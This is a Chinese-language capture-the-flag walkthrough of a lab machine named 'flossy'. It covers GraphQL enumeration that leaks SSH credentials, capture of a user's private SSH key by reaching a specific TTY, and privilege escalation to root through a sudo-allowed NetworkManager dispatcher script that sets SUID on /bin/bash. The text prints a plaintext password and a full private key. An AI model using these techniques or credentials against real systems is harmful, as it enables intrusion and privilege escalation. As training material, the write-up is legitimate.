难度:Medium
kali:192.168.56.104
靶机:192.168.56.142
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.142
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-01 21:01 CST
Nmap scan report for 192.168.56.142
Host is up (0.00018s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:98:4D:04 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
开了22 80两个端口
浅扫目录
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.142 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.142
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,html,txt,php,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2392]
Progress: 425366 / 1323366 (32.14%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 425604 / 1323366 (32.16%)
===============================================================
Finished
===============================================================
只有index.html 0.0
去web看看什么情况
很朴素的界面
查看源码发现是graphql服务,通过发送json到graphql请求数据
没有东西
看一下有没有账号密码
没有找到,把character修改成user看一下
再改成users
好像有东西了,爆破一下id
id=9的时候爆破出来一组账号密码malo/8YdsA3CkiWx968
ssh连接看看
┌──(root㉿kali2)-[~/Desktop]
└─# ssh malo@192.168.56.142
The authenticity of host '192.168.56.142 (192.168.56.142)' can't be established.
ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:50: [hashed name]
~/.ssh/known_hosts:54: [hashed name]
~/.ssh/known_hosts:55: [hashed name]
~/.ssh/known_hosts:69: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.142' (ED25519) to the list of known hosts.
malo@192.168.56.142's password:
Linux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─malo@flossy ~
╰─$ whoami
malo
拿到shell
malo用户下没有user flag
╭─malo@flossy ~
╰─$ ls -al
total 216
drwxr-xr-x 5 malo malo 4096 Apr 1 15:11 .
drwxr-xr-x 4 root root 4096 Oct 6 20:49 ..
-rw------- 1 malo malo 4 Oct 7 10:06 .bash_history
-rw-r--r-- 1 malo malo 220 Oct 6 18:27 .bash_logout
-rw-r--r-- 1 malo malo 3526 Oct 6 18:27 .bashrc
drwxr-xr-x 3 malo malo 4096 Oct 6 20:59 .local
drwxr-xr-x 12 malo malo 4096 Oct 6 20:06 .oh-my-zsh
-rw-r--r-- 1 malo malo 807 Oct 6 18:27 .profile
drwx------ 2 malo malo 4096 Oct 10 18:36 .ssh
-rw-r--r-- 1 malo malo 51798 Apr 1 15:10 .zcompdump-flossy-5.9
-r--r--r-- 1 malo malo 119920 Apr 1 15:10 .zcompdump-flossy-5.9.zwc
-rw------- 1 malo malo 44 Apr 1 15:11 .zsh_history
-rw-r--r-- 1 malo malo 3890 Oct 6 18:27 .zshrc
╭─malo@flossy ~
sophie用户有user flag,但是没有权限读
╭─malo@flossy /home/sophie
╰─$ ls -al
total 56
drwxr-xr-x 5 sophie sophie 4096 Oct 10 19:31 .
drwxr-xr-x 4 root root 4096 Oct 6 20:49 ..
-rw------- 1 root root 370 Oct 10 18:37 .bash_history
-rw-r--r-- 1 sophie sophie 220 Oct 6 20:49 .bash_logout
-rw-r--r-- 1 sophie sophie 3526 Oct 6 20:49 .bashrc
drwxr-xr-x 3 sophie sophie 4096 Oct 6 20:49 .local
-rwxr----- 1 root sophie 962 Oct 6 20:35 network
drwxr-xr-x 12 sophie sophie 4096 Oct 6 20:55 .oh-my-zsh
-rw-r--r-- 1 sophie sophie 807 Oct 6 20:49 .profile
-rw-r--r-- 1 sophie sophie 66 Oct 7 10:18 .selected_editor
drwx------ 2 sophie sophie 4096 Oct 10 18:36 .ssh
-rwxr-xr-x 1 sophie sophie 630 Oct 10 14:23 SSHKeySync
-rwx------ 1 sophie sophie 33 Oct 10 17:24 user.txt
-rw-r--r-- 1 sophie sophie 3890 Oct 6 20:49 .zshrc
╭─malo@flossy /home/sophie
╰─$ cat user.txt
cat: user.txt: Permission denied
不过有一个SSHKeySync文件我们可以读取
─malo@flossy /home/sophie
╰─$ cat SSHKeySync
#!/bin/bash
# This script must run every minute in pre-prod
send_private_key() {
local user_name="$1"
local key_path="/home/$user_name/.ssh/id_rsa"
local admin_tty="/dev/pts/24"
if [ -f "$key_path" ]; then
if [ -w "$admin_tty" ]; then
cat "$key_path" > "$admin_tty"
else
echo "Error: Unable to write to $admin_tty"
fi
else
echo "Error: The private key for $user_name doesn't exist."
fi
}
while true ; do
USER="sophie"
echo "Sending $USER's private key to a high-privileged TTY for quick testing..."
send_private_key "$USER"
sleep 1m
done
这个脚本会发送 sophie的私钥,但是tty得是/dev/pts/24
目前tty是/dev/pts/0
╭─malo@flossy /dev/pts
╰─$ tty
/dev/pts/0
那就连25次ssh吧
搞到第25个终端
╭─malo@flossy ~
╰─$ tty
/dev/pts/24
╭─malo@flossy ~
╰─$ -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlfKkxqQRaakvwCsUmqbXFm0cdI4zkp9UcejsdWhZKbuq+9l8l6tP
Nic4xIoq1S++4Xlj8acA9oJG3yFSgwsBNIaqAJq1zxSpDnzBBpSIqZk2OmkHw8BNBth98D
3RKB5d1SOq0pNiBk4dtQ/QGgd7S30oHNlqF524Nf4jCJxkMLUk527Ga+cjPmM068DtOZMF
xfY/gWrnjk44tigt4QP4hkmMEtshPps4SF6dm544FYghYs+rgCH9tx+DfUl7ZFLnBviGL9
RzN7yQLUV/BPFod8SPihd/s7bSMGfBvopCWFcueL0xAd22Q7CU1jSg4W6+aSfbCSRND3ik
tz/SsWN2/RR2H+MQxB11J5qvLFxq291B0Znoi5sgARZUihDihjhPyVL0dco2wrQtL6ey2B
edRtX24GejoGuvdqd3/qHi5R35sZ4zcUCEldNwq0aC/b3EU/cmu16nmDuhJZpT2ILj35cr
ng8Faf39ZAeIRFKsyfibnRMxoBwLkWWyEs8h2APLAAAFiGZJHbxmSR28AAAAB3NzaC1yc2
EAAAGBAJXypMakEWmpL8ArFJqm1xZtHHSOM5KfVHHo7HVoWSm7qvvZfJerTzYnOMSKKtUv
vuF5Y/GnAPaCRt8hUoMLATSGqgCatc8UqQ58wQaUiKmZNjppB8PATQbYffA90SgeXdUjqt
KTYgZOHbUP0BoHe0t9KBzZaheduDX+IwicZDC1JOduxmvnIz5jNOvA7TmTBcX2P4Fq545O
OLYoLeED+IZJjBLbIT6bOEhenZueOBWIIWLPq4Ah/bcfg31Je2RS5wb4hi/Ucze8kC1Ffw
TxaHfEj4oXf7O20jBnwb6KQlhXLni9MQHdtkOwlNY0oOFuvmkn2wkkTQ94pLc/0rFjdv0U
dh/jEMQddSearyxcatvdQdGZ6IubIAEWVIoQ4oY4T8lS9HXKNsK0LS+nstgXnUbV9uBno6
Brr3and/6h4uUd+bGeM3FAhJXTcKtGgv29xFP3Jrtep5g7oSWaU9iC49+XK54PBWn9/WQH
iERSrMn4m50TMaAcC5FlshLPIdgDywAAAAMBAAEAAAGAOMcNhJfYbhFdnt7RKPQWyoubND
kqJxFEqPNBIf3WkTpZ9o42Irn/vuogES+eI2Y2WWsdIIITl8PhsRiNhUgz9x8snRj30ccp
cm5jqqmwi8OTaI+fnIwivn5YRZEqsw24iv2774tWGTwX/JjVvB1sHrvv5eifRvz2JR+rRV
XujBDzPdzQrkfxrOxkvAYr7VqR25EwH8GKl3Rf/f19zc+ymaqcqwEld+7PY3vMIwJIi0Km
HaOz9Usppl7864JZAjZvZu+C1hzouj+hXRFLlUZJGIw+N50C+vmaI0Py4ZDwubwisr+QdP
sihk7GJChCzfs00X5BJ54mUf8o8ka7kjCmoh8niXsOtRGTrThX4U6dy29Fj7q/NHXC9JG8
n4j92V3sQJir4b7EKY9C4dwGM2J/lT41DNluj1iAFj+FZgq/a1BOiIGAgLOloJW9NtPN2M
rdqBVbMaP7C2MRpybCSzVb7MOBk4ySynjk9xHoTgLLzQHHhlOBzua5zfiVrfDLt4v5AAAA
wEAL+tJoildf450QGsY3elLbx9TaUw4uW9bH7YfZ+68eV+TbW5bAzQLV6s1g3Lru1oppVS
Uo2G4uPNyAVHVqU5YNKp0W4f2LfRrwYabEnzGyt5BGWBXHrRl16X2KKk3cuJ/Lld0wY5aJ
iDZE8AL8Hkt6IeReFhCR3CMDOjoLasTnS0k+CLRG5/E22bqy5Y/r07eElt1ptdZXUnbILi
9/TQn0BgMJNbACry7TLYWf11SAW+HlDqvHIait9JJZVvdsCwAAAMEAxWqZ9pKSh1S0riAy
KoQVkuZ5OW27JYZKmJO1MrkwIWO+UXpXyrWCdh2grXLDmli1R688VE07xWg25ygtNR9w2d
UhNYutFu7Mj8IDEVQ3MkQDozdFTNZUmx5cNUKADIbCt88Uwvsw6asQKWuQeyXivLPVkTLI
Vp3MD5e8t2jlt8Bprc52xQ3DG1HqgavwP6KSSDkirflegl/I74MSEAyYJ24JqWDJwwOYqu
YGdU5z4TsMm87m9dITdAYtl3fTvXpzAAAAwQDCce6pgoKJiodd1qNdFQzMMBZeP0SqnWUH
vfNJdcKSgg8wJVEC1nupH8JZNUAuXQSUS0y1vqpVMgtvB/ui4HBiyWFsHLg181vhGy880U
HM28Q6oJt8Pi9yJ7iwMMKws5eoYQlV0pvQsh+I+4dhK/v09DHLQ2iPSbaqAxUcRmkhN0VJ
aK3CMiTLcp06jECr7qKu3wJVsHZf5C36M5H1204Iuah851GpSCbmIZSgSd0BNvQQ2/k5tW
jbk/VAmeosQ0kAAAANc29waGllQGZsb3NzeQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
然后用私钥登上sophie的ssh
╭─malo@flossy ~
╰─$ nano id_rsa
╭─malo@flossy ~
╰─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
╭─malo@flossy ~
╰─$ ssh -i id_rsa sophie@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
sophie@127.0.0.1's password:
chmod: cannot access '600': No such file or directory
╭─malo@flossy ~
╰─$ chmod 600 id_rsa
╭─malo@flossy ~
╰─$ ssh -i id_rsa sophie@127.0.0.1
Linux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─sophie@flossy ~
╰─$ whoami
sophie
拿到user flag
sudo -l发现network可以提权
╭─sophie@flossy ~
╰─$ sudo -l
sudo: unable to resolve host flossy: Temporary failure in name resolution
Matching Defaults entries for sophie on flossy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User sophie may run the following commands on flossy:
(ALL : ALL) NOPASSWD: /home/sophie/network*
看一下network
╭─sophie@flossy ~
╰─$ cat network
#!/bin/bash
connected_ip(){
connection_type=TCP
champ=2
ignores=LISTEN
lsof_args=-ni
port_local="[0-9][0-9][0-9][0-9][0-9]->"
lsof "$lsof_args" | grep $connection_type | grep -v "$ignores" |
awk '{print $9}' | cut -d : -f $champ | sort | uniq |
sed s/"^$port_local"//
}
dispatcher() {
for s in /opt/*; do
if [ -f "$s" ]; then
d="/etc/NetworkManager/dispatcher.d/$(basename $s)"
if [ ! -f "$d" ] || [ "$s" -nt "$d" ]; then
return 0
fi
fi
done
return 1
}
update() {
if [[ -z $(find /opt -type f) ]] ; then
exit 0
else
echo "Updating scripts."
cp /opt/* /etc/NetworkManager/dispatcher.d/
chmod +x /etc/NetworkManager/dispatcher.d/*
echo "Scripts updated."
fi
}
case "${1}" in
ip) connected_ip ;;
disp) dispatcher ; update ;;
*) echo "Usage: ./$0 option" ;;
esac
脚本会将opt目录下的文件复制到/etc/NetworkManager/dispatcher.d/并赋予可执行权限,那就可以写个脚本再opt里面,然后执行disp,就会把它复制到/etc/NetworkManager/dispatcher.d/
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ echo "chmod u+s /bin/bash" > /opt/SUID_bash
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ sudo /home/sophie/network disp
sudo: unable to resolve host flossy: Name or service not known
Updating scripts.
Scripts updated.
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ ls -al
total 32
drwxr-xr-x 5 root root 4096 Oct 31 10:55 .
drwxr-xr-x 7 root root 4096 Oct 6 18:52 ..
-rwxr-xr-x 1 root root 2293 Mar 9 2023 01-ifupdown
drwxr-xr-x 2 root root 4096 Mar 9 2023 no-wait.d
drwxr-xr-x 2 root root 4096 Mar 9 2023 pre-down.d
drwxr-xr-x 2 root root 4096 Mar 9 2023 pre-up.d
-rwxr-xr-x 1 root root 20 Oct 31 10:55 SUID_bash
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ ./SUID_bash
chmod: changing permissions of '/bin/bash': Operation not permitted
发现没有权限执行,是因为网络配置需要重新加载
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ ip a 127 ↵
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:98:4d:04 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.142/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 365sec preferred_lft 365sec
inet6 fe80::a00:27ff:fe98:4d04/64 scope link
valid_lft forever preferred_lft forever
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ nmcli con up lo
Connection successfully activated (D-Bus active path: /org/freedesktop/NetworkManager/ActiveConnection/2)
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ ./mybash
chmod: changing permissions of '/bin/bash': Operation not permitted
╭─sophie@flossy /etc/NetworkManager/dispatcher.d
╰─$ bash -p 1 ↵
bash-5.2# id
uid=1001(sophie) gid=1001(sophie) euid=0(root) groups=1001(sophie),100(users)
bash-5.2# cat /root/r*
355cec17306ab25389f376ef4a21422e
成功root